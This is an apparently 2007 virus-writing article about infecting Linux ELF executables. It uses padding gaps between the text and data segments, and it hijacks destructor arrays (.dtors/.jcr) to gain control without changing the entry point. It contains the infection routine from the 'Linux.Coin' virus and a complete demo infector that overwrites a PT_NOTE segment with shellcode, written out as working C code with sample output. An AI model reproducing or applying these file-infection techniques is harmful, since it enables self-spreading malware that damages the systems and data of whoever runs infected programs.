Reverse of a coin: A short note on segment alignment
Reverse of a coin: A short note on segment alignment herm1t, oct 2007 One of the widely used method of ELF files infection was propposed by Silvio Cesare [1]. To inject the virus to a file the free space at the end of text segment, appeared as a result of alignment is used. Alignment is neccessary to prevent the beginning of the data segment and the end of text segment from ending up in the same page. The "hole" in the memory exist no only in the end of text segment, but also at the beginning of data segment: file memory offset address |text | |text | | | | | f0f |_____| 8048f0f |_____| f10 |data | 8049f10 |/////| not only here 8049000 +-----+ <- page boundary |/////| but here too |/////| 8049f10 +-----+ |data | The are two ways to align the segment, to pad the previous segment with zeroes (in file), so the next segment will start in the next page, but by doing so, the size of the file will grow; or increase the address of the segment, so the segments will lay in the file chock-a-block, but the "hole" in the memory will appear. So there are three types of files: * Rare case - there is no hole neither in file, nor in memory. Can do nothing with such file. * Data segment begins from the offset multiple of page size. Like in the original method, we will use the padding of code segment. * Most typical case - no padding, the whole page is available, because the offsets and addresses of the segments must be co-aligned. The same page in file (holding the tail of text and the head of data) is mapped twice and we may "convert" it to the two separate pages. That is all about. It follows from the picture above, that for the files of type three, the space available for virus is exactly equal to the page size, that is 4096 bytes. And all statistics, like what file can be infected by virus with length L are of no use. The example of such calculations can be found in [2]. The data segment may contain the code as well as code segment, despite of "rw-" permissions, and even ExecShield will have nothing against it. By the way, to keep the code in the data segment is the ancient Unix tradition: in the original Unix(R) on PDP-11, the code in the data segment was used for indirect syscalls [3]. A bit of code (from the Linux.Coin virus, the code not related to infection was brought from Linux.Caveat): for (ok = 0, i = 0; i < ehdr->e_phnum; i++) if (phdr[i].p_type == PT_LOAD && phdr[i].p_offset == 0 && (i + 1) < ehdr->e_phnum && phdr[i + 1].p_type == PT_LOAD && phdr[i + 1].p_filesz > 0) { if (phdr->p_filesz != phdr->p_memsz) break; ok++; break; } if (! ok) goto error2; uint32_t dp, tp, ve, vo; vo = phdr[i].p_filesz; ve = phdr[i].p_vaddr + phdr[i].p_filesz; tp = 4096 - (phdr[i].p_filesz & 4095); dp = phdr[i + 1].p_vaddr - (phdr[i + 1].p_vaddr & ~4095); if (tp + dp < size || tp == 0x1000) goto error2; /* we will use the padding in the text segment */ phdr[i].p_memsz += tp; phdr[i].p_filesz += tp; /* ... and this space is also available */ if (dp != 0) { phdr[i+1].p_vaddr -= dp; phdr[i+1].p_paddr -= dp; phdr[i+1].p_offset += tp; phdr[i+1].p_filesz += dp; phdr[i+1].p_memsz += dp; } /* fix PHT */ for (i = i + 2; i < ehdr->e_phnum; i++) if (phdr[i].p_offset >= vo) phdr[i].p_offset += tp + dp; /* insert the page */ if (dp != 0) { ftruncate(h, l + tp + dp); m = (char*)mremap(m, l, l + tp + dp, 0); memmove(m + vo + tp + dp, m + vo, l - vo); } /* fix SHT */ if (ehdr->e_shoff >= vo) ehdr->e_shoff += (tp + dp); Elf32_Shdr *shdr = (Elf32_Shdr*)(m + ehdr->e_shoff); for (i = 0; i < ehdr->e_shnum; i++, shdr++) if (shdr->sh_offset >= vo) shdr->sh_offset += (tp + dp); /* copy the virus body */ memcpy(m + vo, self, size); Let's look how PHT is changed by the exmple of /bin/uname: before LOAD 0x000000 0x08048000 0x08048000 0x032b8 0x032b8 R E 0x1000 LOAD 0x0032b8 0x0804c2b8 0x0804c2b8 0x00662 0x00662 RW 0x1000 DYNAMIC 0x0033e0 0x0804c3e0 0x0804c3e0 0x000c8 0x000c8 RW 0x4 after LOAD 0x000000 0x08048000 0x08048000 0x04000 0x04000 R E 0x1000 LOAD 0x004000 0x0804c000 0x0804c000 0x0091a 0x0091a RW 0x1000 DYNAMIC 0x0043e0 0x0804c3e0 0x0804c3e0 0x000c8 0x000c8 RW 0x4 Virus is partially located both in code and data segments. CRT funny STUFF Izik in his paper [4] pointed out that constructors and destructors might be used in viruses, but provided no actual code. The problem is that you cannot resize those sections after compilation to add your pointers. I'll show you here how to get the promissed fun. Let's look closer to the functions processing the arrays: (defined in crtstuff.c) static void __do_global_ctors_aux () { func_ptr *p; for (p = __CTOR_END__ - 1; *p != (func_ptr) -1; p--) (*p) (); } static void __do_global_dtors_aux () { func_ptr *p; for (p = __DTOR_LIST__ + 1; *p; p++) (*p) (); } Suppose, for descriptive reasons, that we have a hello-program with one constructor (foo) and one destructor (bar): void __attribute__((constructor)) foo (void) {puts("foo");} void __attribute__((destructor)) bar (void) {puts("bar");} main(){puts("hello");} The output of the program will look like this: $ ./hello foo hello bar Note that .jcr section immediately follows the .dtors and usually has zero, this zero might be used as a terminator for the .dtors array and original one could be replaced with virus entry point: .eh_frame: ........ You may override value stored here with Fs if y ou don't care about exception handling .ctors: FFFFFFFF Put here virus address, if you agreed with abov e foo __CTOR_END__-1, look down from here until FFFFF FFF 00000000 __CTOR_END__ .dtors: FFFFFFFF __DTOR_LIST__ (some systems put counter here) bar __DTOR_LIST___+1, look up from here, until 0 00000000 Put here virus address .jcr: 00000000 We usually have 0 here, so we can overwrite the previous one. Here is the simple demo that shows how to use .dtors/.jcr: #include <stdio.h> #include <stdint.h> #include <elf.h> #include <sys/mman.h> unsigned char code[32] = { 0x90, 0x90, 0x90, 0x90, 0x90, 0x60, 0x6a, 0x04, 0x58, 0x6a, 0x01, 0x5b, 0xe8, 0x07, 0x00, 0x00, 0x00, 0x54, 0x45, 0x53, 0x54, 0x21, 0x21, 0x0a, 0x59, 0x6a, 0x05, 0x5a, 0xcd, 0x80, 0x61, 0xc3, }; int main(int argc, char **argv) { if (argc < 2) return 2; int h = open(argv[1], 2); int l = lseek(h, 0, 2); char *m = mmap(NULL, l, PF_R|PF_W, MAP_SHARED, h, 0); if (m == MAP_FAILED) return 2; Elf32_Ehdr *ehdr = (Elf32_Ehdr*)m; Elf32_Phdr *phdr = (Elf32_Phdr*)(m + ehdr->e_phoff); Elf32_Shdr *shdr = (Elf32_Shdr*)(m + ehdr->e_shoff); char *strtab = m + shdr[ehdr->e_shstrndx].sh_offset; int i; uint32_t *cons; for (cons = NULL, i = 1; i < ehdr->e_shnum; i++) if (! strcmp(strtab + shdr[i].sh_name, ".dtors")) cons = (uint32_t*)(m + shdr[i].sh_offset + shdr[i].sh_s ize - 4); printf("%08x %08x\n", cons[0], cons[1]); if (cons == NULL || cons[0] != 0 || cons[1] != 0) return 2; for (i = 0; i < ehdr->e_phnum; i++) { if (phdr[i].p_type == PT_NOTE) { phdr[i].p_type = PT_NULL; cons[0] = phdr[i].p_vaddr; memcpy(m + phdr[i].p_offset, code, 32); } } munmap(m, l); close(h); return 0; } Run it on hello and voila! $ ./hello foo hello bar TEST! Also, if you know that there are no (de-)con-structors in the program, you can adjust values inside __do_global_[cd]tors_aux routines to point it somewhere else and free space occupied by arrays or remove the initialization routines completely, possibly including _fini and frame_dummy (don't forget about calls to them from __libc_csu_fini and _init). The Coin virus uses this method to get the control from host without overriding ELF file entry point. That's kinda all. References 1. Silvio Cesare "Unix viruses", 1999 2. Konrad Rieck, Konrad Kretschmer "BRUNDLE FLY: A good-natured Linux ELF virus", 2001 3. herm1t "The Dawn Virus: Tribute to UNIX/PDP-11", 2006 4. izik "Abusing .CTORS and .DTORS for fun 'n profit"